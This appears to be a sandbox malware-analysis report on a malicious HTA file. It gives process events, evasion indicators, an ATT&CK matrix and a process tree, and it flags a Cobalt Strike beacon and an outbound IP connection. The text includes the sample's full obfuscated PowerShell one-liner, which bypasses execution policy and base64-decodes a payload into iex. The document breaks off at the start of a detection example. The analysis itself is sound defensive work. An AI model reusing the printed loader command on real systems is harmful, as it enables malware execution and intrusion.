    Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
    Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
    Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
    Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
    Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
    Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
    Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
    Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
    Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
    Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
    Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
    Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
    Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
    Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
    Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
    Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
    Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
    Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
    Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
    Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
    Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
    Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
    Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
    Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
    Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
    Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
    Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
    Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
    Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
    Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
    Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
    Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
    Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
    Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
    Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
    Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
    Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
    Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
    Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
    Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
    Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
    Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
    Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
    Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
    Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
    Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
    Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
    Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
    Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
    Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
    Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
    Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
    Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
    Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
    Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
    Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
    Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
    Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
    Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
    Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
    Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
    Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
    Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\csc.exe | Process information set: NOOPENFILEERRORBOX
    Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe | Thread delayed: delay time: 922337203685477
    Source: C:\Windows\SysWOW64\mshta.exe | Window / User API: threadDelayed 7116
    Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe | Window / User API: threadDelayed 7147
    Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe | Window / User API: threadDelayed 2438
    Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\csc.exe | Dropped PE file which has not been started: C:\Users\user\AppData\Local\Temp\l1pl2equ\l1pl2equ.dll
    Source: C:\Windows\SysWOW64\mshta.exe TID: 7404 | Thread sleep count: 7116 > 30
    Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe TID: 7600 | Thread sleep count: 7147 > 30
    Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe TID: 7588 | Thread sleep count: 2438 > 30
    Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe TID: 7648 | Thread sleep time: -9223372036854770s >= -30000s
    Source: C:\Windows\System32\svchost.exe TID: 7808 | Thread sleep time: -30000s >= -30000s
    Source: C:\Windows\System32\svchost.exe | File opened: PhysicalDrive0
    Source: C:\Windows\System32\conhost.exe | Last function: Thread delayed
    Source: powershell.exe, 00000003.00000002.1277241225.00000000087E9000.00000004.00000020.00020000.00000000.sdmp | Binary or memory string: Hyper-V RAWvU
    Source: powershell.exe, 00000003.00000002.1268592235.0000000005107000.00000004.00000800.00020000.00000000.sdmp | Binary or memory string: Remove-NetEventVmNetworkAdapter
    Source: powershell.exe, 00000003.00000002.1268592235.0000000005107000.00000004.00000800.00020000.00000000.sdmp | Binary or memory string: Add-NetEventVmNetworkAdapter
    Source: powershell.exe, 00000003.00000002.1277241225.00000000087E9000.00000004.00000020.00020000.00000000.sdmp | Binary or memory string: Hyper-V RAWP
    Source: powershell.exe, 00000003.00000002.1277241225.000000000881B000.00000004.00000020.00020000.00000000.sdmp, svchost.exe, 00000005.00000002.2396991694.0000020AE7454000.00000004.00000020.00020000.00000000.sdmp | Binary or memory string: Hyper-V RAW
    Source: svchost.exe, 00000005.00000002.2395441463.0000020AE1E2B000.00000004.00000020.00020000.00000000.sdmp | Binary or memory string: Hyper-V RAW`cE
    Source: powershell.exe, 00000003.00000002.1268592235.0000000005107000.00000004.00000800.00020000.00000000.sdmp | Binary or memory string: Get-NetEventVmNetworkAdapter
    Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe | Process information queried: ProcessInformation
    Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe | Process token adjusted: Debug

    HIPS / PFW / Operating System Protection Evasion

    Source: Yara match | File source: amsi32_7552.amsi.csv, type: OTHER
    Source: C:\Windows\SysWOW64\mshta.exe | Process created: C:\Windows\SysWOW64\cmd.exe "C:\Windows\system32\cmd.exe" "/c PowErshELL -Ex byPaSS -Nop -w 1 -c DeViCecredENTialDEployMEnT.exe ; iEx($(iex('[sySTem.texT.enCODing]'+[chaR]0X3a+[CHar]58+'utf8.gETSTRING([SYStem.conVERT]'+[char]58+[cHar]0X3a+'FRoMbaSE64StRiNg('+[chAr]0x22+'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'+[chaR]0x22+'))')))"
    Source: C:\Windows\SysWOW64\cmd.exe | Process created: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe PowErshELL -Ex byPaSS -Nop -w 1 -c DeViCecredENTialDEployMEnT.exe ; iEx($(iex('[sySTem.texT.enCODing]'+[chaR]0X3a+[CHar]58+'utf8.gETSTRING([SYStem.conVERT]'+[char]58+[cHar]0X3a+'FRoMbaSE64StRiNg('+[chAr]0x22+'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'+[chaR]0x22+'))')))"
    Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe | Process created: C:\Windows\Microsoft.NET\Framework\v4.0.30319\csc.exe "C:\Windows\Microsoft.NET\Framework\v4.0.30319\csc.exe" /noconfig /fullpaths @"C:\Users\user\AppData\Local\Temp\l1pl2equ\l1pl2equ.cmdline"
    Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\csc.exe | Process created: C:\Windows\Microsoft.NET\Framework\v4.0.30319\cvtres.exe C:\Windows\Microsoft.NET\Framework\v4.0.30319\cvtres.exe /NOLOGO /READONLY /MACHINE:IX86 "/OUT:C:\Users\user\AppData\Local\Temp\RESFA6B.tmp" "c:\Users\user\AppData\Local\Temp\l1pl2equ\CSC883B0A053CD34D78B131B177ADC31BC6.TMP"
    Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe | Queries volume information: C:\Windows\Microsoft.NET\assembly\GAC_32\System.Data\v4.0_4.0.0.0__b77a5c561934e089\System.Data.dll VolumeInformation
    Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe | Queries volume information: C:\Windows\System32\CatRoot\{F750E6C3-38EE-11D1-85E5-00C04FC295EE}\Microsoft-Windows-Client-Features-Package0313~31bf3856ad364e35~amd64~~10.0.19041.1949.cat VolumeInformation
    Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe | Queries volume information: C:\Windows\Microsoft.NET\assembly\GAC_32\System.Transactions\v4.0_4.0.0.0__b77a5c561934e089\System.Transactions.dll VolumeInformation
    Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe | Queries volume information: C:\ VolumeInformation
    Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe | Queries volume information: C:\Windows\System32\CatRoot\{F750E6C3-38EE-11D1-85E5-00C04FC295EE}\Microsoft-Windows-GroupPolicy-ClientTools-WOW64-Package~31bf3856ad364e35~amd64~~10.0.19041.1949.cat VolumeInformation
    Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe | Queries volume information: C:\Windows\System32\CatRoot\{F750E6C3-38EE-11D1-85E5-00C04FC295EE}\Microsoft-Windows-AppManagement-AppV-WOW64-Package~31bf3856ad364e35~amd64~~10.0.19041.1949.cat VolumeInformation
    Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe | Queries volume information: C:\Windows\Microsoft.NET\assembly\GAC_32\Microsoft.Management.Infrastructure.Native\v4.0_1.0.0.0__31bf3856ad364e35\Microsoft.Management.Infrastructure.Native.dll VolumeInformation
    Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe | Queries volume information: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\Modules\AppvClient\Microsoft.AppV.AppVClientPowerShell.dll VolumeInformation
    Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe | Queries volume information: C:\Windows\Microsoft.NET\assembly\GAC_32\Microsoft.AppV.AppvClientComConsumer\v4.0_10.0.0.0__31bf3856ad364e35\Microsoft.AppV.AppvClientComConsumer.dll VolumeInformation
    Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe | Queries volume information: C:\Windows\System32\CatRoot\{F750E6C3-38EE-11D1-85E5-00C04FC295EE}\Microsoft-Windows-SecureStartup-Subsystem-WOW64-Package~31bf3856ad364e35~amd64~~10.0.19041.1865.cat VolumeInformation
    Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe | Queries volume information: C:\Windows\System32\CatRoot\{F750E6C3-38EE-11D1-85E5-00C04FC295EE}\Microsoft-Windows-SecureStartup-Subsystem-WOW64-Package~31bf3856ad364e35~amd64~en-GB~10.0.19041.1.cat VolumeInformation
    Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe | Queries volume information: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\Modules\BitLocker\Microsoft.BitLocker.Structures.dll VolumeInformation
    Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe | Queries volume information: C:\Windows\System32\CatRoot\{F750E6C3-38EE-11D1-85E5-00C04FC295EE}\Microsoft-Windows-Client-Features-Package03~31bf3856ad364e35~amd64~~10.0.19041.2006.cat VolumeInformation
    Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe | Queries volume information: C:\Windows\Microsoft.NET\assembly\GAC_MSIL\Microsoft.PowerShell.Commands.Management\v4.0_3.0.0.0__31bf3856ad364e35\Microsoft.PowerShell.Commands.Management.dll VolumeInformation
    Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe | Queries volume information: C:\Windows\System32\CatRoot\{F750E6C3-38EE-11D1-85E5-00C04FC295EE}\Microsoft-Windows-Client-Desktop-Required-WOW64-Package0013~31bf3856ad364e35~amd64~~10.0.19041.1949.cat VolumeInformation
    Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe | Queries volume information: C:\Windows\System32\CatRoot\{F750E6C3-38EE-11D1-85E5-00C04FC295EE}\Microsoft-Windows-Client-Features-Package0314~31bf3856ad364e35~amd64~~10.0.19041.2006.cat VolumeInformation
    Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe | Queries volume information: C:\Windows\Microsoft.NET\assembly\GAC_32\Microsoft.KeyDistributionService.Cmdlets\v4.0_10.0.0.0__31bf3856ad364e35\Microsoft.KeyDistributionService.Cmdlets.dll VolumeInformation
    Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe | Queries volume information: C:\Windows\System32\CatRoot\{F750E6C3-38EE-11D1-85E5-00C04FC295EE}\Microsoft-Windows-Client-Desktop-Required-WOW64-Package0014~31bf3856ad364e35~amd64~~10.0.19041.2006.cat VolumeInformation
    Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeQueries volume information: C:\Windows\System32\CatRoot\{F750E6C3-38EE-11D1-85E5-00C04FC295EE}\Microsoft-Windows-Client-Features-Package0313~31bf3856ad364e35~amd64~~10.0.19041.1949.cat VolumeInformationJump to behavior
    Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeQueries volume information: C:\Windows\System32\CatRoot\{F750E6C3-38EE-11D1-85E5-00C04FC295EE}\Microsoft-Windows-Client-Features-Package0313~31bf3856ad364e35~amd64~~10.0.19041.1949.cat VolumeInformationJump to behavior
    Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeQueries volume information: C:\Windows\System32\CatRoot\{F750E6C3-38EE-11D1-85E5-00C04FC295EE}\Microsoft-Windows-Client-Features-Package0313~31bf3856ad364e35~amd64~~10.0.19041.1949.cat VolumeInformationJump to behavior
    Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeQueries volume information: C:\Windows\System32\CatRoot\{F750E6C3-38EE-11D1-85E5-00C04FC295EE}\Microsoft-Windows-Client-Features-Package0313~31bf3856ad364e35~amd64~~10.0.19041.1949.cat VolumeInformationJump to behavior
    Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeQueries volume information: C:\Windows\System32\CatRoot\{F750E6C3-38EE-11D1-85E5-00C04FC295EE}\Microsoft-Windows-Client-Features-Package0313~31bf3856ad364e35~amd64~~10.0.19041.1949.cat VolumeInformationJump to behavior
    Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeQueries volume information: C:\Windows\System32\CatRoot\{F750E6C3-38EE-11D1-85E5-00C04FC295EE}\Microsoft-Windows-Client-Features-Package0313~31bf3856ad364e35~amd64~~10.0.19041.1949.cat VolumeInformationJump to behavior
    Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeQueries volume information: C:\Windows\System32\CatRoot\{F750E6C3-38EE-11D1-85E5-00C04FC295EE}\Microsoft-Windows-Client-Features-Package0313~31bf3856ad364e35~amd64~~10.0.19041.1949.cat VolumeInformationJump to behavior
    Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeQueries volume information: C:\Windows\System32\CatRoot\{F750E6C3-38EE-11D1-85E5-00C04FC295EE}\Microsoft-Windows-Client-Features-Package0314~31bf3856ad364e35~amd64~~10.0.19041.2006.cat VolumeInformationJump to behavior
    Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeQueries volume information: C:\Windows\Microsoft.NET\assembly\GAC_32\Microsoft.SecureBoot.Commands\v4.0_10.0.0.0__31bf3856ad364e35\Microsoft.SecureBoot.Commands.dll VolumeInformationJump to behavior
    Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeQueries volume information: C:\Windows\System32\CatRoot\{F750E6C3-38EE-11D1-85E5-00C04FC295EE}\Microsoft-Windows-Client-Features-WOW64-Package~31bf3856ad364e35~amd64~~10.0.19041.2006.cat VolumeInformationJump to behavior
    Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeQueries volume information: C:\Windows\System32\CatRoot\{F750E6C3-38EE-11D1-85E5-00C04FC295EE}\Microsoft-Windows-Client-Features-Package0314~31bf3856ad364e35~amd64~~10.0.19041.2006.cat VolumeInformationJump to behavior
    Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeQueries volume information: C:\Windows\Microsoft.NET\assembly\GAC_32\Microsoft.WindowsAuthenticationProtocols.Commands\v4.0_10.0.0.0__31bf3856ad364e35\Microsoft.WindowsAuthenticationProtocols.Commands.dll VolumeInformationJump to behavior
    Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeQueries volume information: C:\Windows\Microsoft.NET\assembly\GAC_32\Microsoft.WindowsAuthenticationProtocols.Commands\v4.0_10.0.0.0__31bf3856ad364e35\Microsoft.WindowsAuthenticationProtocols.Commands.dll VolumeInformationJump to behavior
    Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeQueries volume information: C:\Windows\Microsoft.NET\assembly\GAC_32\Microsoft.WindowsAuthenticationProtocols.Commands\v4.0_10.0.0.0__31bf3856ad364e35\Microsoft.WindowsAuthenticationProtocols.Commands.dll VolumeInformationJump to behavior
    Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeQueries volume information: C:\Windows\System32\CatRoot\{F750E6C3-38EE-11D1-85E5-00C04FC295EE}\Microsoft-Windows-Client-Features-WOW64-Package0012~31bf3856ad364e35~amd64~~10.0.19041.2006.cat VolumeInformationJump to behavior
    Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeQueries volume information: C:\Windows\System32\CatRoot\{F750E6C3-38EE-11D1-85E5-00C04FC295EE}\Microsoft-Windows-AppManagement-UEV-WOW64-Package~31bf3856ad364e35~amd64~~10.0.19041.2006.cat VolumeInformationJump to behavior
    Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeQueries volume information: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\Modules\UEV\Microsoft.Uev.Commands.dll VolumeInformationJump to behavior
    Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeQueries volume information: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\Modules\WindowsErrorReporting\Microsoft.WindowsErrorReporting.PowerShell.dll VolumeInformationJump to behavior
    Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeQueries volume information: C:\Program Files (x86)\AutoIt3\AutoItX\AutoItX3.PowerShell.dll VolumeInformationJump to behavior
    Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeQueries volume information: C:\Windows\System32\CatRoot\{F750E6C3-38EE-11D1-85E5-00C04FC295EE}\Microsoft-Windows-Client-Features-Package0313~31bf3856ad364e35~amd64~~10.0.19041.1949.cat VolumeInformationJump to behavior
    Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeQueries volume information: C:\Windows\Microsoft.NET\assembly\GAC_MSIL\System.ServiceProcess\v4.0_4.0.0.0__b03f5f7f11d50a3a\System.ServiceProcess.dll VolumeInformationJump to behavior
    Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeQueries volume information: C:\Windows\Microsoft.NET\assembly\GAC_MSIL\System.Windows.Forms\v4.0_4.0.0.0__b77a5c561934e089\System.Windows.Forms.dll VolumeInformationJump to behavior
    Source: C:\Windows\System32\svchost.exeQueries volume information: C:\ProgramData\Microsoft\Network\Downloader\edb.chk VolumeInformationJump to behavior
    Source: C:\Windows\System32\svchost.exeQueries volume information: C:\ProgramData\Microsoft\Network\Downloader\edb.log VolumeInformationJump to behavior
    Source: C:\Windows\System32\svchost.exeQueries volume information: C:\ProgramData\Microsoft\Network\Downloader\edb.chk VolumeInformationJump to behavior
    Source: C:\Windows\System32\svchost.exeQueries volume information: C:\ProgramData\Microsoft\Network\Downloader\edb.log VolumeInformationJump to behavior
    Source: C:\Windows\System32\svchost.exeQueries volume information: C:\ProgramData\Microsoft\Network\Downloader\edb.log VolumeInformationJump to behavior
    Source: C:\Windows\System32\svchost.exeQueries volume information: C:\ProgramData\Microsoft\Network\Downloader\edb.log VolumeInformationJump to behavior
    Source: C:\Windows\System32\svchost.exeQueries volume information: C:\ProgramData\Microsoft\Network\Downloader\edb.chk VolumeInformationJump to behavior
    Source: C:\Windows\System32\svchost.exeQueries volume information: C:\ProgramData\Microsoft\Network\Downloader\qmgr.db VolumeInformationJump to behavior
    Source: C:\Windows\System32\svchost.exeQueries volume information: C:\ProgramData\Microsoft\Network\Downloader\qmgr.jfm VolumeInformationJump to behavior
    Source: C:\Windows\System32\svchost.exeQueries volume information: C:\ProgramData\Microsoft\Network\Downloader\qmgr.db VolumeInformationJump to behavior
    Source: C:\Windows\System32\svchost.exeQueries volume information: C:\ProgramData\Microsoft\Network\Downloader\qmgr.db VolumeInformationJump to behavior
    Source: C:\Windows\System32\svchost.exeQueries volume information: C:\ VolumeInformationJump to behavior
    Source: C:\Windows\System32\svchost.exeQueries volume information: C:\ VolumeInformationJump to behavior
    Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\csc.exeKey value queried: HKEY_LOCAL_MACHINE\SOFTWARE\Microsoft\Cryptography MachineGuidJump to behavior
MITRE ATT&CK Matrix (rebuilt per tactic from the flattened export; the number in parentheses is the count shown in the matrix cell):

Reconnaissance: Gather Victim Identity Information, Credentials, Email Addresses, Employee Names, Gather Victim Network Information, Domain Properties
Resource Development: Acquire Infrastructure, Domains, DNS Server, Virtual Private Server, Server, Botnet
Initial Access: Valid Accounts, Default Accounts, Domain Accounts, Local Accounts, Cloud Accounts, Replication Through Removable Media
Execution: Command and Scripting Interpreter (11), PowerShell (2), At, Cron, Launchd, Scheduled Task
Persistence: DLL Side-Loading (1), Boot or Logon Initialization Scripts, Logon Script (Windows), Login Hook, Network Logon Script, RC Scripts
Privilege Escalation: Process Injection (11), DLL Side-Loading (1), Logon Script (Windows), Login Hook, Network Logon Script, RC Scripts
Defense Evasion: Masquerading (1), Virtualization/Sandbox Evasion (31), Process Injection (11), Obfuscated Files or Information (1), DLL Side-Loading (1), Steganography
Credential Access: OS Credential Dumping, LSASS Memory, Security Account Manager, NTDS, LSA Secrets, Cached Domain Credentials
Discovery: Security Software Discovery (11), Process Discovery (1), Virtualization/Sandbox Evasion (31), Application Window Discovery (1), File and Directory Discovery (1), System Information Discovery (23)
Lateral Movement: Remote Services, Remote Desktop Protocol, SMB/Windows Admin Shares, Distributed Component Object Model, SSH, VNC
Collection: Email Collection (1), Data from Removable Media, Data from Network Shared Drive, Input Capture, Keylogging, GUI Input Capture
Command and Control: Ingress Tool Transfer (4), Non-Application Layer Protocol (2), Application Layer Protocol (12), Protocol Impersonation, Fallback Channels, Multiband Communication
Exfiltration: Exfiltration Over Other Network Medium, Exfiltration Over Bluetooth, Automated Exfiltration, Traffic Duplication, Scheduled Transfer, Data Transfer Size Limits
Impact: Abuse Accessibility Features, Network Denial of Service, Data Encrypted for Impact, Data Destruction, Data Encrypted for Impact, Service Stop
Behavior Graph (ID: 1665127, Sample: sdf.hta, Start date: 15/04/2025, Architecture: WINDOWS, Score: 92)

Top-level signatures: Multi AV Scanner detection for submitted file; Yara detected Powershell decode and execute; Sigma detected: Suspicious MSHTA Child Process; 2 other signatures

Process tree (the number after a process name is the count shown next to it in the graph; signatures in square brackets):
    mshta.exe 1 [Suspicious command line found; PowerShell case anomaly found]
        cmd.exe 1 [Detected Cobalt Strike Beacon; Suspicious powershell command line found; PowerShell case anomaly found]
            powershell.exe 42 [Loading BitLocker PowerShell Module]
                network: 172.245.191.88:80 from local port 49714 (AS-COLOCROSSINGUS, United States)
                dropped: C:\Users\user\AppData\...\l1pl2equ.cmdline (Unicode)
                csc.exe 3
                    dropped: C:\Users\user\AppData\Local\...\l1pl2equ.dll (PE32)
                    cvtres.exe 1
            conhost.exe
    svchost.exe 1 1
        network: 127.0.0.1 (unknown, unknown)
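The chain in the graph (mshta.exe launching cmd.exe, which starts a mixed-case PowerShell one-liner that decodes base64 into iex, after which powershell.exe drops a .cmdline response file under the user profile and csc.exe compiles it) is what the report's "Suspicious MSHTA Child Process", "PowerShell case anomaly found" and "Powershell decode and execute" hits key on. The Python below is an added example written for this page, not part of the Joe Sandbox report or of the sample: it runs those checks over constructed Sysmon-style process-creation events and rebuilds the ancestry of each hit. Only the mshta/cmd PIDs and the image paths are taken from the report; every command line, the remaining PIDs, the csc response-file location, the notepad control event and the rule names are my assumptions.

```python
import ntpath
import re

# Constructed Sysmon-style process-creation events (Event ID 1) that mirror the
# chain in this report: mshta -> cmd -> powershell -> csc -> cvtres. Only the
# mshta/cmd PIDs and image paths come from the report; every command line, the
# other PIDs, the csc response-file path and the notepad control event are
# assumptions, and the base64 payload "QUJD" is just the text "ABC".
PS_CMD = (
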